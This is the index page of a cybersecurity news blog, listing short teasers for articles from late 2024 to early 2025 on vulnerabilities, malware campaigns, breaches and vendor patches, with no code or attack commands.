Home 2017-08-28T17:57:09+05:30

Pumakit: Advanced Linux Rootkit Targets Critical Infrastructure

A highly sophisticated Linux rootkit, Pumakit, has been identified targeting critical infrastructure sectors like telecommunications, finance, and national security. Discovered by Elastic Security Labs, Pumakit highlights a growing trend of [...]

Microsoft Teams now lets users customize notification banner positions

Microsoft Teams now lets users customize banner notification positions to improve focus and productivity. This feature is available for Public Preview and Microsoft 365 Targeted Release members. Microsoft Teams New [...]

AWS Addresses Security Flaws in WorkSpaces, AppStream 2.0, and DCV

AWS has issued a critical security advisory for vulnerabilities in certain versions of its clients for Amazon WorkSpaces, AppStream 2.0, and NICE DCV, identified as CVE-2025-0500 and CVE-2025-0501. These vulnerabilities [...]

New Tool Launched to Detect Hacking Content on Telegram

A Russian developer, supported by the National Technology Initiative, has launched the Apparatus Sapiens AI module to scan Telegram chats and groups, detecting malicious content swiftly to bolster RuNet security [...]

By | January 18th, 2025|Internet Security, Security Advisory, Security Update, Tips|0 Comments

‘Sneaky 2FA’ Phishing Kit Bypasses Microsoft 365 Authentication

Researchers have discovered "Sneaky 2FA," a phishing kit targeting Microsoft 365 accounts to steal credentials and bypass 2FA codes since October 2024. 'Sneaky 2FA' Phishing Kit The "Sneaky 2FA" phishing [...]

Exploit Enables NTLMv1 Despite Active Directory Limits

Researchers discovered a misconfiguration in on-premise applications that bypasses Active Directory Group Policy meant to disable NTLMv1, effectively rendering it ineffective, according to Silverfort's Dor Segal. NTLM, still widely used [...]

By | January 16th, 2025|Exploitation, Internet Security, Security Advisory, Security Update, Tips|0 Comments

Hackers Exploit YouTube Links and Microsoft 365 Themes to Steal Logins

Cybercriminals are running advanced phishing attacks on Microsoft 365 users using fake URLs that closely resemble real O365 domains, tricking victims into trusting them. All about the attack The attackers [...]

Hackers Exploit Zero-Day in Fortinet Firewalls

Hackers are targeting Fortinet FortiGate firewalls with exposed management interfaces online. Arctic Wolf reports that between November and December 2024, attackers exploited a suspected zero-day vulnerability to gain unauthorized access [...]

Microsoft Alerts Microsoft 365 Users to MFA Issue

Microsoft has warned of an MFA issue affecting some Microsoft 365 users, blocking access to certain applications and disrupting essential operations. Microsoft announced the issue through its official MSFT365 Status [...]

By | January 13th, 2025|Internet Security, Microsoft, Security Advisory, Security Update, Tips|0 Comments

Juniper Networks Flaw Allowed Remote Network Attacks

Juniper Networks disclosed CVE-2025-21598, a critical vulnerability in Junos OS and Junos OS Evolved, allowing remote attackers to exploit an out-of-bounds read in the routing protocol daemon (rpd), causing crashes [...]

LDAP Exploit Delivers Info-Stealing Malware

Cybercriminals are exploiting critical LDAP vulnerabilities (CVE-2024-49112 and CVE-2024-49113) by distributing fake proof-of-concept (PoC) exploits for “LDAPNightmare” (CVE-2024-49113). These fake PoCs, disguised as legitimate tools, trick security researchers and administrators [...]

PriveShield: Advanced Privacy with Profile Isolation

The PRIVESHIELD browser extension automatically creates isolated profiles to group websites based on browsing habits and interactions, blocking cross-site tracking and cookie-matching used for targeted ads. All about PriveShield Evaluation [...]

By | January 8th, 2025|Internet Security, Security Advisory, Security Update, Tips|0 Comments

Chrome Update: Fixes for Multiple Security Flaws

Google has updated Chrome to version 131.0.6778.264/.265 for Windows and Mac, and 131.0.6778.264 for Linux, fixing critical security flaws. The update will roll out gradually, and users are urged to [...]

Hackers breached Argentina’s airport security payroll system

Hackers breached Argentina's Airport Security Police (PSA) payroll system, exposing sensitive employee information. They accessed salary records and altered pay slips, making unauthorized deductions between 2,000 to 5,000 pesos under [...]

WordPress Plugin Exploits Websites to Steal Customer Payment Information

Cybercriminals created PhishWP, a malicious WordPress plugin, to mimic payment gateways like Stripe for phishing attacks on compromised sites. PhishWP integrates with Telegram to steal real-time data, including credit card [...]

Android Security Update Fixes Critical RCE Vulnerabilities

The January 2025 Android Security Bulletin highlights critical vulnerabilities affecting Android devices. Users should update to security patch level 2025-01-05 or later to stay protected. Critical RCE Vulnerabilities The bulletin [...]

WordPress Plugin Flaw Puts 3 Million Sites at Risk of Injection Attacks

A critical vulnerability has been found in the UpdraftPlus: WP Backup & Migration Plugin, affecting over 3 million WordPress sites. This flaw allows unauthenticated attackers to exploit a PHP Object [...]

Critical OpenSSH Vulnerability (CVE-2024-6387) Exploit Released

A PoC exploit for the critical OpenSSH vulnerability CVE-2024-6387 has been released, enabling remote attackers to execute arbitrary code on vulnerable servers, posing serious risks to users. CVE-2024-6387 The vulnerability [...]

Apple Settles Siri Privacy Lawsuit for $95M

Apple has agreed to pay $95 million to settle a class-action lawsuit claiming Siri violated users' privacy by recording conversations without consent. The settlement, filed in federal court in Oakland, [...]

By | January 3rd, 2025|Apple, Internet Security, Security Advisory, Security Update|0 Comments

ASUS Vulnerabilities Allow Arbitrary Command Execution

ASUS warns of critical router flaws (CVE-2024-12912, CVE-2024-13062) allowing arbitrary command execution. Users are urged to update their devices immediately. ASUS Vulnerability The vulnerabilities are tied to the router firmware’s [...]

Cyberhaven Chrome Extension Compromised, Potentially Impacting 400,000 Users

Cyberhaven, a cybersecurity company, revealed that its Chrome extension, with over 400,000 users, was targeted in a cyberattack on Christmas Eve 2024. The attack was part of a larger campaign [...]

By | December 31st, 2024|BOTNET, Compromised, Data Breach, Security Advisory, Security Update|0 Comments

PoC Exploit Released for Oracle WebLogic Vulnerability

Researchers warn of a public PoC exploit for a critical Oracle WebLogic vulnerability. Oracle WebLogic Vulnerability The flaw, CVE-2024-21182, is a serious risk for organizations using Oracle WebLogic Server, allowing [...]

Microsoft warns of a Windows 11 24H2 issue blocking security updates

Microsoft has warned of an issue affecting Windows 11 version 24H2 that blocks critical security updates. The problem occurs when users install this version using media with the October or [...]

By | December 31st, 2024|Internet Security, Microsoft, Security Advisory, Security Update, Tips|0 Comments

New Botnet exploits D-Link routers for remote control

Researchers observed increased activity from the "FICORA" and "CAPSAICIN" variants, which exploit vulnerabilities in outdated D-Link routers like DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. Attackers use the HNAP protocol to execute [...]

IBM AIX TCP/IP vulnerability allows Denial of Service attacks

IBM has warned of two security flaws (CVE-2024-47102 and CVE-2024-52906) in its AIX operating system that could cause systems to crash (denial-of-service attacks). These flaws affect specific parts of AIX [...]

Adobe warns of ColdFusion file-reading vulnerability

Adobe released a critical security update for ColdFusion to address a vulnerability that allows attackers to read arbitrary files. All about the vulnerability - ColdFusion This vulnerability allows attackers to [...]

By | December 27th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

Araneida Scanner – Hackers Exploit Cracked Acunetix Scanner

Threat analysts report the “Araneida Scanner,” based on a cracked Acunetix version, is used for illegal activities like data scraping and exploiting vulnerabilities. Sold on Telegram, it’s actively used by [...]

Node.js systeminformation Package Enables RCE Attacks

A critical command injection vulnerability in the systeminformation npm package, CVE-2024-56334, exposes millions of systems to RCE and privilege escalation attacks. The flaw affects versions ≤5.23.6 and lies in the [...]

Malicious Amazon Appstore apps record screens and intercept OTPs

The “BMI CalculationVsn” app on the Amazon App Store secretly collects sensitive data, like app package names and SMS messages, posing a privacy risk. Its true intent appears to be [...]

Skuld Malware Exploits Windows Utilities Packages

Researchers uncovered a malware campaign in the npm ecosystem, where “k303903” used fake packages to spread the Skuld info stealer, compromising hundreds of machines before removal. Skuld Malware Analysis shows [...]

BADBOX botnet hacked 74,000 Android devices with remote codes

BADBOX is a cybercriminal operation that infects Android devices, like TV boxes and smartphones, with malware before they are sold. These devices, often sold through trusted retailers, pose a major [...]

Malicious supply chain attacks shift from npm to VSCode Marketplace

Researchers have observed a rise in malicious activity on the VSCode Marketplace, exposing its vulnerability to supply chain attacks similar to those previously seen in the npm community. Malicious actors [...]

Careto: A Notorious Threat Group Targets Windows with Microphone Recording and File Theft

Recent research links The Mask group to a 2022 attack on a Latin American organization, exploiting an MDaemon email server and WorldClient webmail for persistent access. The initial compromise method [...]

New VIPKeyLogger in Office Docs Steals Credentials

VIPKeyLogger, similar to the Snake Keylogger, spreads through phishing campaigns via attachments disguised as archive or Microsoft 365 files. It uses malicious Office documents to connect to C2 servers and [...]

Hackers Exploit Windows Management Console for Backdoor Payloads

The FLUX#CONSOLE campaign exploits .MSC files to deploy backdoor malware, highlighting advanced phishing and Windows feature abuse. The FLUX#CONSOLE campaign is a multi-stage attack aimed at delivering backdoor malware. It [...]

Malicious ads on CAPTCHA pages spread password stealers

Cybercriminals are using fake CAPTCHA pages to spread password-stealing malware. These fake CAPTCHAs, often appearing as pop-ups, trick users into running harmful PowerShell commands through malicious ads, mimicking legitimate verification [...]

By | December 18th, 2024|Internet Security, Security Advisory, Security Update, Tips|0 Comments

Hackers exploit Apache Struts2 flaw to upload malware

Hackers are exploiting a new Apache Struts2 vulnerability (CVE-2024-53677) with a critical CVSS score of 9.5, posing severe risks. Apache Struts2 flaw Apache Struts2 recently announced a vulnerability with path-traversal, [...]

Hackers Exploit Microsoft Teams for Remote System Access

Hackers used Microsoft Teams to trick victims into granting remote system access, showcasing advanced social engineering tactics, according to Trend Micro. All about the attack - Microsoft Teams Exploit The [...]

Dell Security Update Patches Multiple Critical Vulnerabilities

Dell Technologies has issued a security advisory for critical vulnerabilities that could be exploited by attackers. Customers should update their systems to fix two critical CVEs affecting multiple Dell products. [...]

By | December 13th, 2024|Internet Security, Security Advisory, Security Update, vulnerability|0 Comments

Stealthy Linux Malware PUMAKIT Escalates Privileges

Researchers at Elastic Security Labs discovered PUMAKIT, a Linux malware using stealth and unique privilege escalation to persist on infected systems. PUMAKIT has a multi-stage setup, including a dropper, two [...]

Emoji Exploit Targets iOS Messenger Group Calls

A new vulnerability in Facebook Messenger for iOS could disrupt group calls by exploiting emoji reactions. Discovered by Signal 11 Research in version 472.0.0 and analyzed in version 477.0.0, this [...]

Skoda and Volkswagen car vulnerabilities allow hackers to track users remotely

Researchers have found vulnerabilities in the infotainment systems of some Skoda and Volkswagen cars, which could let hackers track users and access sensitive data remotely. PCAutomotive, an automotive cybersecurity firm, [...]

By | December 12th, 2024|Internet Security, Security Advisory, Security Update, vulnerability|0 Comments

Microsoft 365 Services Affected: Web Apps and Admin Center Down

Microsoft is investigating a widespread outage that impacted access to Microsoft 365 web apps and the admin center. Users experienced issues connecting to services like Outlook, OneDrive, and other Office [...]

By | December 11th, 2024|Internet Security, Microsoft, Security Advisory, Security Update|0 Comments

Meeten Malware Targets macOS and Windows to Steal Logins

Realst malware targets Web3 professionals using fake companies like "Meetio" with AI-generated content. Victims are lured into downloading malicious meeting apps during fake video calls. Meeten Malware Realst is a [...]

Microsoft Patch Tuesday : 71 Vulnerabilities Fixed

Microsoft’s final Patch Tuesday of 2024 addresses 71 vulnerabilities, including 16 critical ones and a zero-day. This update highlights Microsoft’s commitment to improving product security and safeguarding users from cyber [...]

Critical Qlik Sense RCE vulnerability discovered

A critical vulnerability in Qlik Sense for Windows may allow remote code execution. It affects all versions up to the May 2024 Patch 9 release. The "High" severity vulnerability in [...]

Cipla Allegedly Hacked, Akira Ransomware Claims 70GB Data Stolen

Cipla, an Indian pharmaceutical company, has reportedly been attacked by the Akira ransomware group. The hackers claim to have stolen 70GB of sensitive data. This breach has raised concerns about [...]

By | December 9th, 2024|Internet Security, Ransomware, Security Advisory, Security Update, Tips|0 Comments

Google Launches Vanir: An open-source tool for validating security patches

Google has launched Vanir, an open-source tool to simplify and automate security patch validation. First previewed at the Android Bootcamp in April, Vanir helps Android developers and OEMs quickly adopt [...]

By | December 9th, 2024|google, Internet Security, Security Advisory, Security Update, Tips|0 Comments

SonicWall Flaws Enable Remote Code Execution

SonicWall warns of critical flaws in SMA 100 series appliances, enabling remote code execution, authentication bypass, and system compromise. SonicWall advises users to update their SMA 200, 210, 400, 410, [...]

HCL DevOps Deploy & Launch Vulnerable to HTML Injection

A newly discovered vulnerability in HCL Software's DevOps Deploy and Launch platforms, CVE-2024-42195, allows attackers to insert arbitrary HTML tags into the web UI, which could expose sensitive information. CVE-2024-42195 [...]

By | December 6th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

ChatGPT Next Web Vulnerability Allows SSRF Exploits via Endpoint

Researchers reported CVE-2023-49785, a critical ChatGPT Next Web (NextChat) vulnerability, raising cybersecurity concerns over its SSRF exploitation potential. NextChat is a web interface for large language models (LLMs) like ChatGPT, [...]

ElizaRAT Uses Google, Telegram, & Slack for C2 Communications

APT36, a Pakistani cyber-espionage group, now uses ElizaRAT, a Windows RAT with advanced evasion and C2 features, to target Indian government, diplomats, and military. APT36 uses Windows, Linux, and Android [...]

Hackers Exploit Windows Event Logs for Manipulation and Data Theft

Hackers exploit wevtutil.exe for LOLBAS attacks, enabling command execution, payload downloads, and persistence while bypassing security. wevtutil.exe is a Windows tool for managing event logs, but attackers can misuse it [...]

Apple Safari JavaScriptCore RCE Vulnerability Actively Exploited 

CVE-2024-44308, a critical Safari vulnerability, has been actively exploited, impacting iOS, visionOS, and macOS. Affected Software and Versions The CVE-2024-44308 vulnerability impacts several Apple platforms, as summarized below: SoftwareAffected VersionPatched [...]

By | December 3rd, 2024|Apple, Internet Security, Security Advisory, Security Update, Tips|0 Comments

Amazon GuardDuty Gains AI/ML Threat Detection for Cloud Security

Amazon has improved cloud security with AI/ML threat detection in GuardDuty. This new feature enhances threat detection by using AWS's cloud visibility and scale to better protect applications, workloads, and [...]

By | December 2nd, 2024|cloud, Internet Security, Security Advisory, Security Update|0 Comments

HPE IceWall Flaw Enabled Unauthorized Data Changes

HPE has released a security alert about a critical flaw in its IceWall product, CVE-2024-11856, which lets attackers remotely modify data without permission. HPE IceWall Flaw CVE-2024-11856 stems from a [...]

Matrix Orchestrates Global DDoS Attack Campaign

Cybersecurity researchers have uncovered a large-scale DDoS campaign attributed to a threat actor known as "Matrix." Despite the actor's low technical skills, the campaign demonstrates how easily accessible tools are [...]

Beware of PixPirate Malware Targeting WhatsApp Users

PixPirate malware is targeting users in Brazil, India, Italy, and Mexico, posing as a fake authentication app to steal banking data. It spreads through Smishing and WhatsApp spam from infected [...]

NVIDIA Vulnerability Enables Data Tampering and Privilege Escalation

NVIDIA has issued a critical security update for a major vulnerability in its Unified Fabric Manager (UFM) products. Identified as CVE-2024-0130, the flaw has a high CVSS v3.1 score of [...]

Exploitation of ProjectSend Authentication Vulnerability Discovered in the Wild

ProjectSend, an open-source file-sharing web app, is actively being exploited after CVE-2024-11680 was assigned on November 25, 2024. Despite a patch being available for over a year, many instances remain [...]

New Stealthy GodLoader Malware Targets Multiple Platforms

GodLoader malware, discovered by Check Point, stealthily infects Windows, macOS, Linux, Android, and iOS, using the Godot Engine to evade antivirus detection. GodLoader Malware GodLoader uses the Godot Engine’s scripting [...]

RomCom Hackers Exploit Windows Zero-Days & Firefox Vulnerability

The Russian-aligned group RomCom exploited two critical zero-day vulnerabilities in Mozilla Firefox and Windows in a sophisticated cyber-espionage campaign, allowing attackers to execute malicious code without user interaction. The first [...]

Huge Credit Card Breach: Database of Over 1.2 Million Cards Found on Dark Web

A major data breach has caused widespread concern, as a database with sensitive financial details of over 1.2 million credit cards was leaked on the dark web. Cybersecurity sources report [...]

Meta has taken down 2 million malicious accounts

Meta has removed over 2 million accounts involved in malicious activities, including complex fraud schemes like "pig butchering." This action is part of Meta’s ongoing efforts to fight criminal networks [...]

Python NodeStealer Targets Facebook Business Accounts for Credential Theft.

The Python-based NodeStealer has evolved, now targeting Facebook Ads Manager budgets, stealing credit card info, and browser credentials. It uses Windows Restart Manager to unlock databases and employs obfuscation techniques [...]

Helldown Ransomware Targets ESXi and Linux

Helldown, a new ransomware group, has been exploiting vulnerabilities to breach networks and compromise victims since August 2024, with 28 breaches reported so far. They have been leaking stolen data [...]

Two Malicious PyPi Packages Mimicking ChatGPT & Claude Steal Developer Data

Two malicious Python packages pretending to be tools for ChatGPT and Claude were found on PyPI, the official Python library repository. They went undetected for over a year, compromising developer [...]

Trend Micro Deep Security Flaw Allows Remote Code Execution

Trend Micro has revealed a critical vulnerability in Deep Security 20 Agent that could allow remote code execution on affected systems. All about the Vulnerability - CVE-2024-51503 The vulnerability, identified [...]

Hackers Exploit Misconfigured Servers to Stream Live Sports

Recent threat analysis examined outbound traffic and binaries in container environments. Researchers, using honeypot data and threat intelligence, flagged unusual network events involving the tool ffmpeg. While not malicious itself, [...]

Apache Kafka Vulnerability Enables Privilege Escalation

A new vulnerability, CVE-2024-31141, was found in Apache Kafka Clients, allowing attackers to escalate privileges and gain unauthorized file access. Rated as Moderate, it affects several versions and is a [...]

By | November 19th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

Citrix Virtual Apps & Desktops Zero-Day Actively Exploited

A critical unpatched vulnerability has been found in Citrix Virtual Apps and Desktops, now being actively exploited. The flaw, revealed by Watchtowr Labs, poses a significant risk, especially in remote [...]

Zohocorp ADAudit Plus SQL Injection Vulnerability

Zoho released a security update for a critical SQL injection flaw in ADAudit Plus (CVE-2024-49574), fixed in version 8123 on November 8, 2024. The SQL injection vulnerability was found in [...]

By | November 18th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

CISA Warns of Exploited Palo Alto Networks Vulnerabilities

CISA issued an urgent alert for two Palo Alto Networks vulnerabilities, CVE-2024-9463 and CVE-2024-9465, which are actively being exploited by cybercriminals. These vulnerabilities pose serious risks, especially to federal systems. [...]

Chinese SilkSpecter hackers targeting Black Friday shoppers

Chinese hacker group SilkSpecter launched a phishing campaign targeting Black Friday shoppers in Europe and the USA, using Stripe to steal card data while allowing legitimate transactions. SilkSpecter's Phishing Campaign [...]

4M+ WordPress Sites Vulnerable After Plugin Flaw

Critical flaw found in 'Really Simple Security' WordPress plugin, risking 4M+ sites. CVE-2024-10924 allows potential remote attacks and unauthorized admin access. CVE-2024-10924 The vulnerability impacts versions 9.0.0 to 9.1.1.1 of [...]

Windows 0-Day Exploited with Single Right Click

A recently discovered zero-day vulnerability, CVE-2024-43451, is being actively exploited, targeting Windows systems across multiple versions. Identified by the ClearSky Cyber Security team in June 2024, this vulnerability has been [...]

Google to Issue CVEs for Major Cloud Security Flaws

Google Cloud will start issuing CVEs for critical vulnerabilities in its services, aiming to boost transparency and security. This step highlights Google’s commitment to helping organizations guard against threats and [...]

By | November 14th, 2024|google, Internet Security, Security Advisory, Security Update, Tips|0 Comments

Critical Flaw Found in Dell SONiC

Dell Technologies has revealed critical vulnerabilities in its Enterprise SONiC OS (versions 4.1.x and 4.2.x), which could allow attackers to take control of affected systems. Users are urged to upgrade [...]

By | November 13th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

Amazon Confirms Employee Data Breach Through Third-Party Vendor

Amazon confirmed that employee data was exposed due to a breach at a third-party vendor, which exploited a critical vulnerability in MOVEit file transfer software. The CVE-2023-34362 vulnerability, first reported [...]

Hackers Use Google Ads to Distribute Fakebat Malware

Researchers have found that Fakebat malware is again being spread through malicious Google Ads, targeting users searching for popular productivity software. Malwarebytes flagged an ad impersonating the app Notion. The [...]

By | November 12th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update, Tips|0 Comments

Roblox Devs Targeted with Malicious npm Packages

Researchers found five malicious npm packages targeting Roblox developers, stealing credentials and personal data. These packages, including autoadv, ro.dll, node-dlls, and two rolimons-api versions, mimic legitimate modules commonly used by [...]

By | November 12th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update|0 Comments

Hackers Use Malicious Excel Files to Deliver Remcos RAT to Windows Users

Hackers exploit Excel documents due to their popularity and built-in vulnerabilities. With VBA macros now blocked by default, they have turned to using “.XLL” files to deliver malware. Hackers Use [...]

By | November 11th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update, windows|0 Comments

Watch Out for Fake Copyright Claims Spreading Rhadamanthys Stealer

CheckPoint security experts recently warned about fake copyright claims spreading Rhadamanthys stealer malware. Stealer malware is designed to infiltrate computers and steal sensitive data. Once installed, it connects to a [...]

By | November 9th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update|0 Comments

Cisco Vulnerability Allowed Attackers to Execute Commands as Root

A critical vulnerability in Cisco Unified Industrial Wireless Software, affecting Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points, has been discovered. CVE-2024-20418 Tracked as CVE-2024-20418, this flaw allows unauthenticated remote attackers [...]

ToxicPanda Malware Targets Bank Users

Recent research has identified a new Android malware strain, initially mistaken for TgToxic, now called ToxicPanda. Although it shares some bot command similarities, ToxicPanda’s code diverges significantly, lacking key TgToxic [...]

Threat Actor Leaks Alleged Nokia Source Code

The threat actor known as IntelBroker, along with EnergyWeaponUser, has claimed responsibility for a major data breach involving Nokia’s proprietary source code. This news has shaken the tech industry and [...]

ClickFix Malware Targets GMeet, Zoom Pages

The “ClickFix” tactic exploits fake Google Meet and Zoom pages to deliver advanced malware, mimicking legitimate video conferencing platforms used for business and personal communication. The Sekoia TDR team monitors [...]

Hackers Bypass Endpoints with EDRSandBlast

Palo Alto Networks’ Unit 42 recently found that hackers are using AV and EDR bypass tools from cybercrime forums to evade endpoint security. EDRSandBlast An extortion probe revealed two outdated [...]

Spectre Flaw Persists in AMD, Intel CPUs

Researchers have shown an exploit for the Spectre Flaw, targeting the Indirect Branch Predictor Barrier (IBPB) vulnerability. This issue affects modern AMD and Intel CPUs and may result in data [...]

SYS01 InfoStealer Malware Targets Meta Business Page

The Meta malvertising campaign, active for over a month, spreads SYS01 InfoStealer by disguising it within ElectronJs apps, presented as legitimate tools like video editors, productivity software, and streaming services. [...]

Evasive Panda Targets Cloud Services with New Toolkit to Steal Data

Evasive Panda deployed a new C# tool, CloudScout, in early 2023 to target a Taiwanese government entity. CloudScout uses modules to hijack web sessions, accessing services like Google Drive, Gmail, [...]

Critical Chrome Security Vulnerabilities Fixed

Google has released a Chrome update addressing critical vulnerabilities, safeguarding millions of users. The latest Stable version, 130.0.6723.91/.92, is now rolling out for Windows, Mac, and Linux, with Extended Stable [...]

Hackers Exploit SonicWall VPNs with Fog Ransomware

Recent cyberattacks by Akira and Fog threat actors have targeted multiple industries by exploiting a vulnerability (CVE-2024-40766) in SonicWall SSL VPN devices, using malicious VPN logins from VPS-hosted IP addresses [...]

WrnRAT Delivered as Gambling Games

WrnRAT is a new malware that cybercriminals deploy by disguising it as popular gambling games like Badugi, Go-Stop, and Hold'em. WrnRAT Malware Attackers set up a fake gambling website that [...]

Realtek SD Card Driver Flaw Impacts Laptops

Multiple vulnerabilities in the Realtek SD card reader driver, RtsPer.sys, affect laptops from major brands like Dell and Lenovo. These flaws have existed for years, allowing users to exploit the [...]

Critical Authentication Flaw in WhatsUp Gold Exposes Organizations to Attack

WhatsUp Gold, a popular network monitoring tool, has a critical vulnerability in versions before 2024.0.0, exposing organizations to potential cyber attacks and unauthorized data access. CVE-2024-6670 and CVE-2024-6671 are critical [...]

Cisco ASA SSH Flaw Leaves Devices Vulnerable

Cisco issued a critical advisory for a vulnerability in its Adaptive Security Appliance (ASA) Software that could let remote attackers execute commands with root privileges. The flaw, CVE-2024-20329, affects devices [...]

Roundcube Webmail Vulnerability Exploited in Attacks

Stored XSS vulnerability in Roundcube Webmail is exploited in attacks on ex-USSR government agencies. Researchers identified the attack but cannot determine the perpetrators Roundcube Webmail Vulnerability cybersecurity researchers detected active [...]

By | October 25th, 2024|Exploitation, Security Advisory, Security Update, vulnerability|0 Comments

GitLab Patches Critical HTML Injection Flaw Allowing XSS Attacks

GitLab released patches (17.5.1, 17.4.3, and 17.3.6) for both Community and Enterprise Editions, fixing a critical HTML injection vulnerability in the Global Search feature that could lead to XSS attacks, [...]

Lazarus APT Hackers Exploit Chrome Zero-Day via Crypto Game

Lazarus APT exploited a Chrome zero-day using a crypto-themed game as bait, showcasing the group’s evolving financial tactics and social engineering. On May 13, 2024, Kaspersky detected a new infection [...]

Critical Vulnerabilities Found in VMware vCenter Server

Broadcom has issued critical security updates for severe vulnerabilities in VMware vCenter Server that allow remote code execution and privilege escalation. The flaws, CVE-2024-38812 and CVE-2024-38813, impact multiple versions of [...]

GHOSTPULSE Malware Leverages PNG Pixel Structure for Evasion

PNG files are popular and widely used on the internet, making them a tempting target for threat actors. They can hide malicious code in these files using techniques like steganography. [...]

Hackers Impersonate ESET to Distribute Wiper Malware

Hackers posed as ESET to spread wiper malware via phishing emails starting October 8, 2024. The emails, claiming to be from “ESET’s Advanced Threat Defense Team,” warned of state-sponsored attacks [...]

Hackers use Bumblebee malware to infiltrate corporate networks

Bumblebee malware has reemerged, threatening corporate networks globally, following its first sighting since Europol’s May 2024 Operation Endgame. Bumblebee malware Bumblebee, first identified by Google's Threat Analysis Group in March [...]

Hackers Reportedly Selling Stolen Data from Cisco

A group of hackers reportedly sells sensitive data stolen from Cisco, allegedly by IntelBroker in collaboration with EnergyWeaponUser and zjj, raising concerns in the tech industry. Breach Details A post [...]

By | October 15th, 2024|cisco, Internet Security, Security Advisory, Security Update|0 Comments

ErrorFather hackers remotely attack and control Android devices

The ErrorFather campaign, a new variant of the Cerberus banking trojan, emerged in September 2024. It uses a multi-stage dropper to spread and has seen a rise in activity, posing [...]

PureLogs, a low-cost infostealer, is targeting Chrome browsers

Infostealer malware, like the recently identified PureLogs, poses significant risks due to its low cost and ease of use, making it accessible to even low-level hackers. PureLogs is a 64-bit [...]

Hackers exploited a zero-day vulnerability in Qualcomm chips, targeting Android users

Hackers exploit a zero-day vulnerability (CVE-2024-43047) in Qualcomm chipsets, risking millions of Android users globally. The flaw stems from memory corruption in DSP Services. Zero-day vulnerability in Qualcomm chips Google’s [...]

Foxit PDF Reader vulnerability allows attackers to execute arbitrary code

Researchers revealed six new vulnerabilities, including a critical one in Foxit PDF Reader that allows arbitrary code execution. Three flaws were also found in Veertu's Anka Build, threatening CI/CD environments [...]

Mozilla warns of a Firefox zero-day vulnerability actively exploited in cyberattacks

A critical use-after-free vulnerability in Firefox and Firefox Extended Support Release (ESR) is being actively exploited in cyberattacks. Mozilla has issued a warning about a critical zero-day vulnerability in Firefox, [...]

CISA warns of active exploitation of Microsoft zero-day vulnerabilities

CISA warns of two critical Microsoft zero-day vulnerabilities, CVE-2024-43572 and CVE-2024-43573, actively exploited in the wild. CVE-2024-43572 The first vulnerability, CVE-2024-43572, affects the Microsoft Windows Management Console, allowing attackers to [...]

Hackers breached the president’s account of a Japanese aerospace company

Hackers infiltrated JAXA, compromising top officials' accounts, including President Hiroshi Yamakawa, in a series of cyberattacks since June 2023. Since mid-2023, JAXA has been hit by four significant cyberattacks. In [...]

By | October 9th, 2024|Internet Security, Security Advisory, Security Update, Tips|0 Comments

LemonDuck malware targets Windows servers by exploiting SMB vulnerabilities

Attackers used the EternalBlue vulnerability to access the observatory farm, create a hidden admin share, and run a malicious batch file named p.bat, which opened firewall ports, set up port [...]

By | October 8th, 2024|Malware, Security Advisory, Security Update, vulnerability|0 Comments

Cacti vulnerability allows attackers to execute remote code

A critical vulnerability in the Cacti network monitoring tool, discovered in version 1.2.28, could allow attackers to execute remote code on affected systems. This flaw is particularly concerning for system [...]

CVE-2024-30052: RCE vulnerability in Visual Studio via dump files

A researcher identified a method to exploit Visual Studio by executing arbitrary code during the debugging of managed dump files, without needing memory corruption or specific PDB file components. By [...]

WarmCookie malware spreads via fake update campaign in France

FakeUpdate, a fake browser update scam, is now targeting users in France, aiming to deploy the WarmCookie backdoor malware. FakeUpdate Spreads WarmCookie as Chrome, Edge Updates Researchers at Gen Threat [...]

Perfctl malware targets millions of Linux servers

Perfctl, a stealthy malware, is actively targeting millions of Linux servers worldwide. Discovered by Aqua Nautilus researchers, it exploits over 20,000 different server misconfigurations. This campaign has been ongoing for [...]

Arc Browser Launches Bug Bounty Program After RCE Vulnerability

The Browser Company has launched a Bug Bounty Program for its Arc Browser after quickly resolving a remote code execution (RCE) vulnerability, as announced by CEO Josh, highlighting their commitment [...]

Chrome vulnerabilities enable attackers to run arbitrary code

Google released a Chrome update fixing critical vulnerabilities that could allow arbitrary code execution. Version 129.0.6668.89/.90 is now available for Windows, Mac, and Linux. All about the chrome vulnerabilities Three [...]

New XWorm variant spreads via Windows script files

XWorm is a malware known for its obfuscation techniques and ability to evade detection, posing a significant cybersecurity threat. NetSkope recently found a new variant delivered via a Windows script [...]

Hackers targeting Docker Swarm, Kubernetes, and SSH servers in large-scale attacks

Hackers are exploiting Docker Swarm, Kubernetes, and SSH servers, targeting Docker API vulnerabilities as the entry point in a widespread malware campaign, according to DataDog researchers. Large-Scale Server Exploits Threat [...]

Linux CUPS has multiple vulnerabilities that allow remote code execution

Developers of the Linux printing system CUPS recently disclosed several vulnerabilities that could allow attackers to execute arbitrary code. Although these flaws require specific conditions to be exploited, their high [...]

GorillaBot reigns as DDoS king with 300,000+ commands

The newly emerged Gorilla Botnet has launched over 300,000 DDoS attacks across 100+ countries from September 4 to 27. A modified version of Mirai, it supports multiple CPU architectures and [...]

North Korean Hackers Tried to Steal Military Data

Diehl Defence anti-aircraft missiles are successfully intercepting Russian attacks on Kyiv, with a 100% hit rate. Germany also plans to install these systems on three new government aircraft for missile [...]

HTML smuggling enables hackers to deliver convincing phishing attacks

Phishing attackers used an HTML smuggling technique to deliver malware. The attack began with a phishing email that looked like an American Express notification, leading to several redirects. The last [...]

NIST Recommends New Password Security Rules

NIST released new password security guidelines in Special Publication 800-63B, improving cybersecurity and user experience. One of the key changes in NIST’s guidelines is their view on password complexity. Instead [...]

By | September 27th, 2024|Internet Security, Security Advisory, Security Update, Tips|0 Comments

Watch out for fake “verify you’re human” prompts that can deliver malware

CAPTCHAs, or Completely Automated Public Turing tests, are used online to verify users are human, not bots. They usually present challenges like distorted text, image recognition tasks, or audio prompts [...]

TeamViewer Privilege Escalation Vulnerability

